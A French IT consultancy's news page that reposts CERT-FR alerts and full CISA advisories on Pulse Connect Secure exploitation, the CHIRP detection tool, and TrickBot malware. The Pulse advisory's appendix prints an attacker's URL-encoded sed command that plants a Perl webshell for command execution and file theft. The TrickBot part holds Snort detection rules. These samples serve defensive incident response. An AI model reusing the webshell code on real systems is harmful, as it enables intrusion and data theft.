Ankaa Pmo®

Articles

CERTFR-2021-ALE-007 : Vulnérabilité dans Pulse Connect Secure (20 avril 2021)

Actualités, Sécurité de l'information et du SI, Sécurité de l’information, Sécurité du système d’information

Le 20 avril 2021, Pulse Secure a publié un bulletin de sécurité concernant la vulnérabilité CVE-2021-22893 (cf. section Documentation). Celle-ci permet à un attaquant non authentifié d’exécuter du code arbitraire à distance. Aucun correctif n’est pour l’instant disponible.

Le même …
Source de l’article sur CERT-FR

20 avril 2021/par Service comm.

AA21-110A: Exploitation of Pulse Connect Secure Vulnerabilities

Sécurité de l'information et du SI, Sécurité de l’information, Sécurité du système d’information

Original release date: April 20, 2021 | Last revised: April 21, 2021

Summary

The Cybersecurity and Infrastructure Security Agency (CISA) is aware of compromises affecting U.S. government agencies, critical infrastructure entities, and other private sector organizations by a cyber threat actor—or actors—beginning in June 2020 or earlier related to vulnerabilities in certain Ivanti Pulse Connect Secure products. Since March 31, 2021, CISA assisted multiple entities whose vulnerable Pulse Connect Secure products have been exploited by a cyber threat actor. These entities confirmed the malicious activity after running the Pulse Secure Connect Integrity Tool. To gain initial access, the threat actor is leveraging multiple vulnerabilities, including CVE-2019-11510, CVE-2020-8260, CVE-2020-8243, and the newly disclosed CVE-2021-22893. The threat actor is using this access to place webshells on the Pulse Connect Secure appliance for further access and persistence. The known webshells allow for a variety of functions, including authentication bypass, multi-factor authentication bypass, password logging, and persistence through patching.

Ivanti has provided a mitigation and is developing a patch. CISA strongly encourages organizations using Ivanti Pulse Connect Secure appliances to immediately run the Pulse Secure Connect Integrity Tool, update to the latest software version, and investigate for malicious activity.

Technical Details

On March 31, 2021, Ivanti released the Pulse Secure Connect Integrity Tool to detect the integrity of Pulse Connect Secure appliances. Their technical bulletin states:

We are aware of reports that a limited number of customers have identified unusual activity on their Pulse Connect Secure (PCS) appliances. The investigation to date shows ongoing attempts to exploit vulnerabilities outlined in two security advisories that were patched in 2019 and 2020 to address previously known issues: Security Advisory SA44101 (CVE-2019-11510) and Security Advisory SA44601 (CVE- 2020- 8260). For more information visit KB44764 (Customer FAQ).

The suspected cyber threat actor modified several legitimate Pulse Secure files on the impacted Pulse Connect Secure appliances. The modifications implemented a variety of webshell functionality:

DSUpgrade.pm MD5: 4d5b410e1756072a701dfd3722951907
- Runs arbitrary commands passed to it
- Copies malicious code into Licenseserverproto.cgi
Licenseserverproto.cgi MD5: 9b526db005ee8075912ca6572d69a5d6
- Copies malicious logic to the new files during the patching process, allowing for persistence
Secid_canceltoken.cgi MD5: f2beca612db26d771fe6ed7a87f48a5a
- Runs arbitrary commands passed via HTTP requests
compcheckresult.cgi MD5: ca0175d86049fa7c796ea06b413857a3
- Publicly-facing page to send arbitrary commands with ID argument
Login.cgi MD5: 56e2a1566c7989612320f4ef1669e7d5
- Allows for credential harvesting of authenticated users
Healthcheck.cgi MD5: 8c291ad2d50f3845788bc11b2f603b4a
- Runs arbitrary commands passed via HTTP requests

Other files were found with additional functionality:

libdsplibs.so MD5: 416488b6c8a9bdb9c0cb592e36f44677
- Trojanized shared object to bypass multi-factor authentication via a hard-coded backdoor key.

Many of the threat actor’s early actions are logged in the Unauthenticated Requests Log as seen in the following format, URIs have been redacted to minimize access to webshells that may still be active:

Unauthenticated request url /dana-na/[redacted URI]?id=cat%20/home/webserver/htdocs/dana-na/[redacted URI] came from IP XX.XX.XX.XX.

The threat actor then ran the commands listed in table 1 via the webshell.

Table 1: Commands run via webshell

Time	Command
2021-01-19T07:46:05.000+0000	`pwd`
2021-01-19T07:46:24.000+0000	`cat%20/home/webserver/htdocs/dana-na/[redacted]`
2021-01-19T08:10:13.000+0000	`cat%20/home/webserver/htdocs/dana-na/l[redacted]`
2021-01-19T08:14:18.000+0000	See Appendix.
2021-01-19T08:15:11.000+0000	`cat%20/home/webserver/htdocs/dana-na/[redacted]`
2021-01-19T08:15:49.000+0000	`cat%20/home/webserver/htdocs/dana-na/[redacted]`
2021-01-19T09:03:05.000+0000	`cat%20/home/webserver/htdocs/dana-na/[redacted]`
2021-01-19T09:04:47.000+0000	`$mount`
2021-01-19T09:05:13.000+0000	`/bin/mount%20-o%20remount,rw%20/dev/root%20/`
2021-01-19T09:07:10.000+0000	`$mount`

The cyber threat actor is using exploited devices located on residential IP space—including publicly facing Network Attached Storage (NAS) devices and small home business routers from multiple vendors—to proxy their connection to interact with the webshells they placed on these devices. These devices, which the threat actor is using to proxy the connection, correlate with the country of the victim and allow the actor activity to blend in with normal telework user activity.

Details about lateral movement and post-exploitation are still unknown at this time. CISA will update this alert as this information becomes available.

Mitigations

CISA strongly urges organizations using Pulse Secure devices to immediately:

Review the Pulse Secure Connect Integrity Tool Quick Start Guide and Customer FAQs
Run the Pulse Secure Connect Integrity Tool.
- The tool requires a reboot.
- If virtualized, take a snapshot before running.
- If the appliance is physical, consider the consequences of rebooting and running the tool and contact Ivanti for assistance or questions.
- Continue to run the tool daily until the XML mitigations have been implemented or the patch has been deployed.
Implement the mitigations released by the vendor. According Ivanti Pulse Secure, the interim XML configurations listed in the « Workaround » section of SA44784 – 2021-04: Out-of-Cycle Advisory: Pulse Connect Secure RCE Vulnerability (CVE-2021-22893) provide significant protection against threat actor activity.
Update to the latest software version, per the process outlined on Ivanti Pulse Secure’s website which contains security enhancements.

If the Integrity Checker Tools finds mismatched or unauthorized files, CISA urges organizations to:

Contact CISA to report your findings (see Contact Information section below).
Contact Ivanti Pulse Secure for assistance in capturing forensic information.
Review “Unauthenticated Web Requests” log for evidence of exploitation, if enabled.
Change all passwords associated with accounts passing through the Pulse Secure environment (including user accounts, service accounts, administrative accounts and any accounts that could be modified by any account described above, all of these accounts should be assumed to be compromised). Note: Unless an exhaustive password reset occurs, factory resetting a Pulse Connect Secure appliance (see Step 3 below) will only remove malicious code from the device, and may not remove the threat actor from the environment. The threat actor may use the credentials harvested to regain access even after the appliance is fully patched.
Review logs for any unauthorized authentications originating from the Pulse Connect Secure appliance IP address or the DHCP lease range of the Pulse Connect Secure appliance’s VPN lease pool.
Look for unauthorized applications and scheduled tasks in their environment.
Ensure no new administrators were created or non-privileged users were added to privileged groups.
Remove any remote access programs not approved by the organization.
Carefully inspect scheduled tasks for scripts or executables that may allow a threat actor to connect to an environment.

In addition to the recommendations above, organizations that find evidence of malicious, suspicious, or anomalous activity or files, should consider the guidance in KB44764 – Customer FAQ: PCS Security Integrity Tool Enhancements, which includes:

After preservation, you can remediate your Pulse Connect Secure appliance by:

Disabling the external-facing interface.
Saving the system and user config.
Performing a factory reset via the Serial Console. Note: For more information refer to KB22964 (How to reset a PCS device to the factory default setting via the serial console)
Updating the appliance to the newest version.
Re-importing the saved config.
Re-enabling the external interface.

CISA recommends performing checks to ensure any infection is remediated, even if the workstation or host has been reimaged. These checks should include running the Pulse Secure Connect Integrity Tool again after remediation has been taken place.

Contact Information

CISA encourages recipients of this report to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at

1-888-282-0870 (From outside the United States: +1-703-235-8832)
central@cisa.dhs.gov (UNCLASS)
us-cert@dhs.sgov.gov (SIPRNET)
us-cert@dhs.ic.gov (JWICS)

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on the CISA/US-CERT homepage at http://www.us-cert.cisa.gov/.

Appendix: Large sed Command Found In Unauthenticated Logs

Unauthenticated request url /dana-na/[redacted]?id=sed%20-i%20%22/main();/cuse%20MIME::Base64;use%20Crypt::RC4;my%20[redacted];sub%20r{my%20$n=$_[0];my%20$rs;for%20(my%20$i=0;$i%3C$n;$i++){my%20$n1=int(rand(256));$rs.=chr($n1);}return%20$rs;}sub%20a{my%20$st=$_[0];my%20$k=r([redacted]);my%20$en%20=%20RC4(%20$k.$ph,%20$st);return%20encode_base64($k.$en);}sub%20b{my%20$s=%20decode_base64($_[0]);%20my%20$l=length($s);my%20$k=%20substr($s,0,[redacted]);my%20$en=substr($s,[redacted],$l-[redacted]);my%20$de%20=%20RC4(%20$k.$ph,%20$en%20);return%20$de;}sub%20c{my%20$fi=CGI::param(%27img%27);my%20$FN=b($fi);my%20$fd;print%20%22Content-type:%20application/x-download\n%22;open(*FILE,%20%22%3C$FN%22%20);while(%3CFILE%3E){$fd=$fd.$_;}close(*FILE);print%20%22Content-Disposition:%20attachment;%20filename=tmp\n\n%22;print%20a($fd);}sub%20d{print%20%22Cache-Control:%20no-cache\n%22;print%20%22Content-type:%20text/html\n\n%22;my%20$fi%20=%20CGI::param(%27cert%27);$fi=b($fi);my%20$pa=CGI::param(%27md5%27);$pa=b($pa);open%20(*outfile,%20%22%3E$pa%22);print%20outfile%20$fi;close%20(*outfile);}sub%20e{print%20%22Cache-Control:%20no-cache\n%22;print%20%22Content-type:%20image/gif\n\n%22;my%20$na=CGI::param(%27name%27);$na=b($na);my%20$rt;if%20(!$na%20or%20$na%20eq%20%22cd%22)%20{$rt=%22Error%20404%22;}else%20{my%20$ot=%22/tmp/1%22;system(%22$na%20%3E/tmp/1%202%3E&1%22);open(*cmd_result,%22%3C$ot%22);while(%3Ccmd_result%3E){$rt=$rt.$_;}close(*cmd_result);unlink%20$ot}%20%20print%20a($rt);}sub%20f{if(CGI::param(%27cert%27)){d();}elsif(CGI::param(%27img%27)%20and%20CGI::param(%27name%27)){c();}elsif(CGI::param(%27name%27)%20and%20CGI::param(%27img%27)%20eq%20%22%22){e();}else{%20%20%20&main();}}if%20($ENV{%27REQUEST_METHOD%27}%20eq%20%22POST%22){%20%20f();}else{&main();%20}%22%20/home/webserver/htdocs/dana-na/[redacted] came from IP XX.XX.XX.XX

References

Revisions

April 20, 2021: Initial version
April 21, 2021: Added CERT/CC Vulnerability Note to References

This product is provided subject to this Notification and this Privacy & Use policy.

Source de l’article sur us-cert.gov

20 avril 2021/par Service comm.

CERTFR-2021-ALE-006 : Vulnérabilité dans F5 BIG-IP (20 mars 2021)

Actualités, Sécurité de l'information et du SI, Sécurité de l’information, Sécurité du système d’information

Dans son bulletin d’actualité du 15 mars 2021, le CERT-FR soulignait la gravité de plusieurs vulnérabilités affectant les équipements BIG-IP de F5 Networks, et notamment la CVE-2021-22986.

Le 19 mars 2021, l’éditeur indique que des attaques massives sont en cours, …
Source de l’article sur CERT-FR

20 mars 2021/par Service comm.

AA21-077A: Detecting Post-Compromise Threat Activity Using the CHIRP IOC Detection Tool

Sécurité de l'information et du SI, Sécurité de l’information, Sécurité du système d’information

Original release date: March 18, 2021

Summary

This Alert announces the CISA Hunt and Incident Response Program (CHIRP) tool. CHIRP is a forensics collection tool that CISA developed to help network defenders find indicators of compromise (IOCs) associated with activity detailed in the following CISA Alerts:

AA20-352A: Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations, which primarily focuses on an advanced persistent threat (APT) actor’s compromise of SolarWinds Orion products affecting U.S. government agencies, critical infrastructure entities, and private network organizations.

AA21-008A: Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments, which addresses APT activity within Microsoft 365/Azure environments and offers an overview of—and guidance on—available open-source tools. The Alert includes the CISA-developed Sparrow tool that helps network defenders detect possible compromised accounts and applications in the Azure/M365 environment.

Similar to Sparrow—which scans for signs of APT compromise within an M365 or Azure environment—CHIRP scans for signs of APT compromise within an on-premises environment.

In this release, CHIRP, by default, searches for IOCs associated with malicious activity detailed in AA20-352A and AA21-008A that has spilled into an on-premises enterprise environment.

CHIRP is freely available on the CISA GitHub Repository. For additional guidance watch CISA’s CHIRP Overview video. Note: CISA will continue to release plugins and IOC packages for new threats via the CISA GitHub Repository.

CISA advises organizations to use CHIRP to:

Examine Windows event logs for artifacts associated with this activity;
Examine Windows Registry for evidence of intrusion;
Query Windows network artifacts; and
Apply YARA rules to detect malware, backdoors, or implants.

Network defenders should review and confirm any post-compromise threat activity detected by the tool. CISA has provided confidence scores for each IOC and YARA rule included with CHIRP’s release. For confirmed positive hits, CISA recommends collecting a forensic image of the relevant system(s) and conducting a forensic analysis on the system(s).

If an organization does not have the capability to follow the guidance in this Alert, consider soliciting third-party IT security support. Note: Responding to confirmed positive hits is essential to evict an adversary from a compromised network.

Click here for a PDF version of this report.

Technical Details

How CHIRP Works

CHIRP is a command-line executable with a dynamic plugin and indicator system to search for signs of compromise. CHIRP has plugins to search through event logs and registry keys and run YARA rules to scan for signs of APT tactics, techniques, and procedures. CHIRP also has a YAML file that contains a list of IOCs that CISA associates with the malware and APT activity detailed in CISA Alerts AA20-352A and AA21-008A.

Currently, the tool looks for:

The presence of malware identified by security researchers as TEARDROP and RAINDROP;
Credential dumping certificate pulls;
Certain persistence mechanisms identified as associated with this campaign;
System, network, and M365 enumeration; and
Known observable indicators of lateral movement.

Network defenders can follow step-by-step instructions on the CISA CHIRP GitHub repository to add additional IOCs, YARA rules, or plugins to CHIRP to search for post-compromise threat activity related to the SolarWinds Orion supply chain compromise or new threat activity.

Compatibility

CHIRP currently only scans Windows operating systems.

Instructions

CHIRP is available on CISA’s GitHub repository in two forms:

A compiled executable
A python script

CISA recommends using the compiled version to easily scan a system for APT activity. For instructions to run, read the README.md in the CHIRP GitHub repository.

If you choose to use the native Python version, see the detailed instructions on the CHIRP GitHub repository.

Mitigations

Interpreting the Results

CHIRP provides results of its scan in JSON format. CISA encourages uploading the results into a security information and event management (SIEM) system, if available. If no SIEM system is available, results can be viewed in a compatible web browser or text editor. If CHIRP detects any post-compromise threat activity, those detections should be reviewed and confirmed. CISA has provided confidence scores for each IOC and YARA rule included with CHIRP’s release. For confirmed positive hits, CISA recommends collecting a forensic image of the relevant system(s) and conducting a forensic analysis on the system(s).

If you do not have the capability to follow the guidance in this Alert, consider soliciting third-party IT security support. Note: Responding to confirmed positive hits is essential to evict an adversary from a compromised network.

Frequently Asked Questions

What systems should CHIRP run on?
Systems running SolarWinds Orion or believed to be involved in any resulting lateral movement.
What should I do with results?
Ingest the JSON results into a SIEM system, web browser, or text editor.
Are there existing tools that CHIRP complements and/or provide the same benefit as CHIRP?
1. Antivirus software developers may have begun to roll out detections for the SolarWinds post-compromise activity. However, those products can miss historical signs of compromise. CHIRP can provide a complementary benefit to antivirus when run.
2. CISA previously released the Sparrow tool that scans for APT activity within M365 and Azure environments related to activity detailed in CISA Alerts AA20-352A and AA21-008A. CHIRP provides a complementary capability to Sparrow by scanning for on-premises systems for similar activity.
How often should I run CHIRP?
CHIRP can be run once or routinely. Currently, CHIRP does not provide a mechanism to run repeatedly in its native format.
Do I need to configure the tool before I run it?
No.
Will CHIRP change or affect anything on the system(s) it runs on?
No, CHIRP only scans the system(s) it runs on and makes no active changes.
How long will it take to run CHIRP?
CHIRP will complete its scan in approximately 1 to 2 hours. Duration will be dependent on the level of activity, the system, and the size of the resident data sets. CHIRP will provide periodic progress updates as it runs.
If I have questions, who do I contact?
For general questions regarding CHIRP, please contact CISA via email at central@cisa.dhs.gov or by phone at 1-888-282-0870. For reporting indicators of potential compromise, contact us by submitting a report through our website at https://us-cert.cisa.gov/report. For all technical issues or support for CHIRP, please submit issues at the CISA CHIRP GitHub Repository.

Revisions

March 18, 2021: Initial Publication

This product is provided subject to this Notification and this Privacy & Use policy.

Source de l’article sur us-cert.gov

18 mars 2021/par Service comm.

AA21-076A: TrickBot Malware

Sécurité de l'information et du SI, Sécurité de l’information, Sécurité du système d’information

Original release date: March 17, 2021

Summary

This Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise for all referenced threat actor tactics and techniques.

The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) have observed continued targeting through spearphishing campaigns using TrickBot malware in North America. A sophisticated group of cybercrime actors is luring victims, via phishing emails, with a traffic infringement phishing scheme to download TrickBot.

TrickBot—first identified in 2016—is a Trojan developed and operated by a sophisticated group of cybercrime actors. Originally designed as a banking Trojan to steal financial data, TrickBot has evolved into highly modular, multi-stage malware that provides its operators a full suite of tools to conduct a myriad of illegal cyber activities.

To secure against TrickBot, CISA and FBI recommend implementing the mitigation measures described in this Joint Cybersecurity Advisory, which include blocking suspicious Internet Protocol addresses, using antivirus software, and providing social engineering and phishing training to employees.

Click here for a PDF version of this report.

Technical Details

TrickBot is an advanced Trojan that malicious actors spread primarily by spearphishing campaigns using tailored emails that contain malicious attachments or links, which—if enabled—execute malware (Phishing: Spearphishing Attachment [T1566.001], Phishing: Spearphishing Link [T1566.002]). CISA and FBI are aware of recent attacks that use phishing emails, claiming to contain proof of a traffic violation, to steal sensitive information. The phishing emails contain links that redirect to a website hosted on a compromised server that prompts the victim to click on photo proof of their traffic violation. In clicking the photo, the victim unknowingly downloads a malicious JavaScript file that, when opened, automatically communicates with the malicious actor’s command and control (C2) server to download TrickBot to the victim’s system.

Attackers can use TrickBot to:

Drop other malware, such as Ryuk and Conti ransomware, or
Serve as an Emotet downloader.[1]

TrickBot uses person-in-the-browser attacks to steal information, such as login credentials (Man in the Browser [T1185]). Additionally, some of TrickBot’s modules spread the malware laterally across a network by abusing the Server Message Block (SMB) Protocol. TrickBot operators have a toolset capable of spanning the entirety of the MITRE ATT&CK framework, from actively or passively gathering information that can be used to support targeting (Reconnaissance [TA0043]), to trying to manipulate, interrupt, or destroy systems and data (Impact [TA0040]).

TrickBot is capable of data exfiltration, cryptomining, and host enumeration (e.g., reconnaissance of Unified Extensible Firmware Interface or Basic Input/Output System [UEFI/BIOS] firmware).[2] For host enumeration, operators deliver TrickBot in modules containing a configuration file with specific tasks.

Figure 1 lays out TrickBot’s use of enterprise techniques.

Figure 1: MITRE ATT&CK enterprise techniques used by TrickBot

MITRE ATT&CK Techniques

According to MITRE, TrickBot [S0266] uses the ATT&CK techniques listed in table 1.

Table 1: TrickBot ATT&CK techniques for enterprise

Initial Access [TA0001]

Technique Title	ID	Use
Phishing: Spearphishing Attachment	T1566.001	TrickBot has used an email with an Excel sheet containing a malicious macro to deploy the malware.
Phishing: Spearphishing Link	T1566.002	TrickBot has been delivered via malicious links in phishing emails.

Execution [TA0002]

Technique Title	ID	Use
Scheduled Task/Job: Scheduled Task	T1053.005	TrickBot creates a scheduled task on the system that provides persistence.
Command and Scripting Interpreter: Windows Command Shell	T1059.003	TrickBot has used macros in Excel documents to download and deploy the malware on the user’s machine.
Native API	T1106	TrickBot uses the Windows Application Programming Interface (API) call, CreateProcessW(), to manage execution flow.
User Execution: Malicious Link	T1204.001	TrickBot has sent spearphishing emails in an attempt to lure users to click on a malicious link.
User Execution: Malicious File	T1204.002	TrickBot has attempted to get users to launch malicious documents to deliver its payload.

Persistence [TA0003]

Technique Title	ID	Use
Scheduled Task/Job: Scheduled Task	T1053.005	TrickBot creates a scheduled task on the system that provides persistence.
Create or Modify System Process: Windows Service	T1543.003	TrickBot establishes persistence by creating an autostart service that allows it to run whenever the machine boots.

Privilege Escalation [TA0004]

Technique Title	ID	Use
Scheduled Task/Job: Scheduled Task	T1053.005	TrickBot creates a scheduled task on the system that provides persistence.
Process Injection: Process Hollowing	T1055.012	TrickBot injects into the svchost.exe process.
Create or Modify System Process: Windows Service	T1543.003	TrickBot establishes persistence by creating an autostart service that allows it to run whenever the machine boots.

Defense Evasion [TA0005]

Technique Title	ID	Use
Obfuscated Files or Information	T1027	TrickBot uses non-descriptive names to hide functionality and uses an AES CBC (256 bits) encryption algorithm for its loader and configuration files.
Obfuscated Files or Information: Software Packing	T1027.002	TrickBot leverages a custom packer to obfuscate its functionality.
Masquerading	T1036	The TrickBot downloader has used an icon to appear as a Microsoft Word document.
Process Injection: Process Hollowing	T1055.012	TrickBot injects into the svchost.exe process.
Modify Registry	T1112	TrickBot can modify registry entries.
Deobfuscate/Decode Files or Information	T1140	TrickBot decodes the configuration data and modules.
Subvert Trust Controls: Code Signing	T1553.002	TrickBot has come with a signed downloader component.
Impair Defenses: Disable or Modify Tools	T1562.001	TrickBot can disable Windows Defender.

Credential Access [TA0006]

Technique Title	ID	Use
Input Capture: Credential API Hooking	T1056.004	TrickBot has the ability to capture Remote Desktop Protocol credentials by capturing the CredEnumerateA API.
Unsecured Credentials: Credentials in Files	T1552.001	TrickBot can obtain passwords stored in files from several applications such as Outlook, Filezilla, OpenSSH, OpenVPN and WinSCP. Additionally, it searches for the .vnc.lnk affix to steal VNC credentials.
Unsecured Credentials: Credentials in Registry	T1552.002	TrickBot has retrieved PuTTY credentials by querying the SoftwareSimonTathamPuttySessions registry key.
Credentials from Password Stores	T1555	TrickBot can steal passwords from the KeePass open-source password manager.
Credentials from Password Stores: Credentials from Web Browsers	T1555.003	TrickBot can obtain passwords stored in files from web browsers such as Chrome, Firefox, Internet Explorer, and Microsoft Edge, sometimes using esentutl.

Discovery [TA0007]

Technique Tactic	ID	Use
System Service Discovery	T1007	TrickBot collects a list of install programs and services on the system’s machine.
System Network Configuration Discovery	T1016	TrickBot obtains the IP address, location, and other relevant network information from the victim’s machine.
Remote System Discovery	T1018	TrickBot can enumerate computers and network devices.
System Owner/User Discovery	T1033	TrickBot can identify the user and groups the user belongs to on a compromised host.
Permission Groups Discovery	T1069	TrickBot can identify the groups the user on a compromised host belongs to.
System Information Discovery	T1082	TrickBot gathers the OS version, machine name, CPU type, amount of RAM available from the victim’s machine.
File and Directory Discovery	T1083	TrickBot searches the system for all of the following file extensions: .avi, .mov, .mkv, .mpeg, .mpeg4, .mp4, .mp3, .wav, .ogg, .jpeg, .jpg, .png, .bmp, .gif, .tiff, .ico, .xlsx, and .zip. It can also obtain browsing history, cookies, and plug-in information.
Account Discovery: Local Account	T1087.001	TrickBot collects the users of the system.
Account Discovery: Email Account	T1087.003	TrickBot collects email addresses from Outlook.
Domain Trust Discovery	T1482	TrickBot can gather information about domain trusts by utilizing Nltest.

Collection [TA0009]

Technique Tactic	ID	Use
Data from Local System	T1005	TrickBot collects local files and information from the victim’s local machine.
Input Capture:Credential API Hooking	T1056.004	TrickBot has the ability to capture Remote Desktop Protocol credentials by capturing the CredEnumerateA API.
Person in the Browser	T1185	TrickBot uses web injects and browser redirection to trick the user into providing their login credentials on a fake or modified webpage.

Command and Control [TA0011]

Technique Tactic	ID	Use
Fallback Channels	T1008	TrickBot can use secondary command and control (C2) servers for communication after establishing connectivity and relaying victim information to primary C2 servers.
Application Layer Protocol: Web Protocols	T1071.001	TrickBot uses HTTPS to communicate with its C2 servers, to get malware updates, modules that perform most of the malware logic and various configuration files.
Ingress Tool Transfer	T1105	TrickBot downloads several additional files and saves them to the victim’s machine.
Data Encoding: Standard Encoding	T1132.001	TrickBot can Base64-encode C2 commands.
Non-Standard Port	T1571	Some TrickBot samples have used HTTP over ports 447 and 8082 for C2.
Encrypted Channel: Symmetric Cryptography	T1573.001	TrickBot uses a custom crypter leveraging Microsoft’s CryptoAPI to encrypt C2 traffic.

Exfiltration [TA0010]

Technique Tactic	ID	Use
Exfiltration Over C2 Channel	T1041	TrickBot can send information about the compromised host to a hardcoded C2 server.

Detection

Signatures

CISA developed the following snort signature for use in detecting network activity associated with TrickBot activity.

alert tcp any [443,447] -> any any (msg: »TRICKBOT:SSL/TLS Server X.509 Cert Field contains ‘example.com’ (Hex) »; sid:1; rev:1; flow:established,from_server; ssl_state:server_hello; content: »|0b|example.com »; fast_pattern:only; content: »Global Security »; content: »IT Department »; pcre: »/(?:x09x00xc0xb9x3bx93x72xa3xf6xd2|x00xe2x08xffxfbx7bx53x76x3d)/ »; classtype:bad-unknown; metadata:service ssl,service and-ports;)

alert tcp any any -> any $HTTP_PORTS (msg: »TRICKBOT_ANCHOR:HTTP URI GET contains ‘/anchor' »; sid:1; rev:1; flow:established,to_server; content: »/anchor »; http_uri; fast_pattern:only; content: »GET »; nocase; http_method; pcre: »/^/anchor_?.{3}/[w_-]+.[A-F0-9]+/?$/U »; classtype:bad-unknown; priority:1; metadata:service http;)

alert tcp any $SSL_PORTS -> any any (msg: »TRICKBOT:SSL/TLS Server X.509 Cert Field contains ‘C=XX, L=Default City, O=Default Company Ltd' »; sid:1; rev:1; flow:established,from_server; ssl_state:server_hello; content: »|31 0b 30 09 06 03 55 04 06 13 02|XX »; nocase; content: »|31 15 30 13 06 03 55 04 07 13 0c|Default City »; nocase; content: »|31 1c 30 1a 06 03 55 04 0a 13 13|Default Company Ltd »; nocase; content:! »|31 0c 30 0a 06 03 55 04 03| »; classtype:bad-unknown; reference:url,www.virustotal.com/gui/file/e9600404ecc42cf86d38deedef94068db39b7a0fd06b3b8fb2d8a3c7002b650e/detection; metadata:service ssl;)

alert tcp any any -> any $HTTP_PORTS (msg: »TRICKBOT:HTTP Client Header contains ‘boundary=Arasfjasu7′ »; sid:1; rev:1; flow:established,to_server; content: »boundary=Arasfjasu7|0d 0a| »; http_header; content: »name=|22|proclist|22| »; http_header; content:! »Referer »; content:! »Accept »; content: »POST »; http_method; classtype:bad-unknown; metadata:service http;)

alert tcp any any -> any $HTTP_PORTS (msg: »TRICKBOT:HTTP Client Header contains ‘User-Agent|3a 20|WinHTTP loader/1.' »; sid:1; rev:1; flow:established,to_server; content: »User-Agent|3a 20|WinHTTP loader/1. »; http_header; fast_pattern:only; content: ».png|20|HTTP/1. »; pcre: »/^Hostx3ax20(?:d{1,3}.){3}d{1,3}(?:x3ad{2,5})?$/mH »; content:! »Accept »; http_header; content:! »Referer|3a 20| »; http_header; classtype:bad-unknown; metadata:service http;)

alert tcp any $HTTP_PORTS -> any any (msg: »TRICKBOT:HTTP Server Header contains ‘Server|3a 20|Cowboy' »; sid:1; rev:1; flow:established,from_server; content: »200″; http_stat_code; content: »Server|3a 20|Cowboy|0d 0a| »; http_header; fast_pattern; content: »content-length|3a 20|3|0d 0a| »; http_header; file_data; content: »/1/ »; depth:3; isdataat:!1,relative; classtype:bad-unknown; metadata:service http;)

alert tcp any any -> any $HTTP_PORTS (msg: »TRICKBOT:HTTP URI POST contains C2 Exfil »; sid:1; rev:1; flow:established,to_server; content: »Content-Type|3a 20|multipart/form-data|3b 20|boundary=——Boundary »; http_header; fast_pattern; content: »User-Agent|3a 20| »; http_header; distance:0; content: »Content-Length|3a 20| »; http_header; distance:0; content: »POST »; http_method; pcre: »/^/[a-z]{3}d{3}/.+?.[A-F0-9]{32}/d{1,3}//U »; pcre: »/^Hostx3ax20(?:d{1,3}.){3}d{1,3}$/mH »; content:! »Referer|3a| »; http_header; classtype:bad-unknown; metadata:service http;)

alert tcp any any -> any $HTTP_PORTS (msg: »HTTP URI GET/POST contains ‘/56evcxv’ (Trickbot) »; sid:1; rev:1; flow:established,to_server; content: »/56evcxv »; http_uri; fast_pattern:only; classtype:bad-unknown; metadata:service http;)

alert icmp any any -> any any (msg: »TRICKBOT_ICMP_ANCHOR:ICMP traffic conatins ‘hanc' »; sid:1; rev:1; itype:8; content: »hanc »; offset:4; fast_pattern; classtype:bad-unknown;)

alert tcp any any -> any $HTTP_PORTS (msg: »HTTP Client Header contains POST with ‘host|3a 20|*.onion.link’ and ‘data=’ (Trickbot/Princess Ransomeware) »; sid:1; rev:1; flow:established,to_server; content: »POST »; nocase; http_method; content: »host|3a 20| »; http_header; content: ».onion.link »; nocase; http_header; distance:0; within:47; fast_pattern; file_data; content: »data= »; distance:0; within:5; classtype:bad-unknown; metadata:service http;)

alert tcp any any -> any $HTTP_PORTS (msg: »HTTP Client Header contains ‘host|3a 20|tpsci.com’ (trickbot) »; sid:1; rev:1; flow:established,to_server; content: »host|3a 20|tpsci.com »; http_header; fast_pattern:only; classtype:bad-unknown; metadata:service http;)

Mitigations

CISA and FBI recommend that network defenders—in federal, state, local, tribal, territorial governments, and the private sector—consider applying the following best practices to strengthen the security posture of their organization’s systems. System owners and administrators should review any configuration changes prior to implementation to avoid negative impacts.

Provide social engineering and phishing training to employees.
Consider drafting or updating a policy addressing suspicious emails that specifies users must report all suspicious emails to the security and/or IT departments.
Mark external emails with a banner denoting the email is from an external source to assist users in detecting spoofed emails.
Implement Group Policy Object and firewall rules.
Implement an antivirus program and a formalized patch management process.
Implement filters at the email gateway and block suspicious IP addresses at the firewall.
Adhere to the principle of least privilege.
Implement a Domain-Based Message Authentication, Reporting & Conformance validation system.
Segment and segregate networks and functions.
Limit unnecessary lateral communications between network hoses, segments and devices.
Consider using application allowlisting technology on all assets to ensure that only authorized software executes, and all unauthorized software is blocked from executing on assets. Ensure that such technology only allows authorized, digitally signed scripts to run on a system.
Enforce multi-factor authentication.
Enable a firewall on agency workstations configured to deny unsolicited connection requests.
Disable unnecessary services on agency workstations and servers.
Implement an Intrusion Detection System, if not already used, to detect C2 activity and other potentially malicious network activity
Monitor web traffic. Restrict user access to suspicious or risky sites.
Maintain situational awareness of the latest threats and implement appropriate access control lists.
Disable the use of SMBv1 across the network and require at least SMBv2 to harden systems against network propagation modules used by TrickBot.
Visit the MITRE ATT&CK Techniques pages (linked in table 1 above) for additional mitigation and detection strategies.
See CISA’s Alert on Technical Approaches to Uncovering and Remediating Malicious Activity for more information on addressing potential incidents and applying best practice incident response procedures.

For additional information on malware incident prevention and handling, see the National Institute of Standards and Technology Special Publication 800-83, Guide to Malware Incident Prevention and Handling for Desktops and Laptops.

Resources

References

Revisions

March 17, 2021: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Source de l’article sur us-cert.gov

17 mars 2021/par Service comm.

CERTFR-2021-ALE-005 : Multiples vulnérabilités dans Microsoft DNS server (12 mars 2021)

Actualités, Sécurité de l'information et du SI, Sécurité de l’information, Sécurité du système d’information

Contexte

Sept vulnérabilités concernant le serveur DNS de Microsoft ont fait l’objet d’un correctif à l’occasion de la mise à jour mensuelle de mars 2021. Parmi ces vulnérabilités, deux permettent un déni de service alors que les cinq autres permettent une exécution de …
Source de l’article sur CERT-FR

12 mars 2021/par Service comm.

AA21-062A: Mitigate Microsoft Exchange Server Vulnerabilities

